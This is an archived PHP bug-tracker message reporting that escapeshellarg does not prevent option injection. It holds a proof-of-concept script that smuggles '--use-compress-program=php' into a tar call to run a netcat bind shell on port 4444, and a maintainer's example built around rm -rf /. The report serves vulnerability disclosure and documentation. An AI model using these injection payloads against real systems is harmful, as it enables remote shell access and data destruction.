Sec Bug->Doc #65755 [Opn]: Command injection is possible through escapeshellarg

From: Date: Mon, 09 Jun 2014 05:43:54 +0000
Subject: Sec Bug->Doc #65755 [Opn]: Command injection is possible through escapeshellarg
References: 1  Groups: php.doc.bugs 
Request: Send a blank email to doc-bugs+get-11270@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=65755&edit=1 ID: 65755 Updated by: stas@php.net Reported by: wireghoul at justanotherhacker dot com Summary: Command injection is possible through escapeshellarg Status: Open -Type: Security +Type: Documentation Problem Package: *General Issues Operating System: Linux PHP Version: 5.4.20 Block user comment: N Private report: Y Previous Comments: ------------------------------------------------------------------------ [2013-09-30 22:59:12] wireghoul at justanotherhacker dot com Hence my reference to a note in the documentation clarifying the safety of using escapeshellarg on command line switches ------------------------------------------------------------------------ [2013-09-26 17:05:01] johannes@php.net I think this is equivalent to $safe_opts=escapeshellarg('-rf'); $safe_file=escapeshellarg('/'); $r=rm $safe_opts $safe_file; or any other options and rather obvious that we can't protect against bad parameters. ------------------------------------------------------------------------ [2013-09-24 21:40:12] wireghoul at justanotherhacker dot com Description: ------------ Hi there, The documentation and general belief in the PHP community appears to be that escapeshellarg allows you to make user supplied data safe for use on the command line. While this is generally the case, there are some cases where command injection is still possible as putting quotes around command line options such as --exec= is still interpreted as command line options. I have attached a PoC that opens a bindshell on port 4444 using this technique. Cheers, Eldar "Wireghoul" Marcussen Test script: --------------- <?php # PoC exploit of php not escaping dash characters in escapeshellarg/cmd # Reference: http://php.net/manual/en/function.escapeshellarg.php # imagine an export/import function, or perhaps image resize function could be abused like this # Create a malicious file: $fh=fopen('myfile.png', 'w'); fwrite($fh, "<?php system('nc -lvvvp 4444 -e /bin/bash'); echo 'WINRAR!'; ?>"); fclose($fh); # I choose to use php over bash due to string issues, you could use whatever $safe_opts=escapeshellarg('--use-compress-program=php'); $safe_file=escapeshellarg('myfile.png'); # Really a php script with a .png extension $r=tar $safe_opts -cf export.tar $safe_file; print_r($r); ?> Expected result: ---------------- Hard to say, some might argue that this is expected behaviour, in which case the PHP documentation should contain a caveaut IMHO. Actual result: -------------- netcat binds a shell to port 4444 ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=65755&edit=1

« previous php.doc.bugs (#11270) next »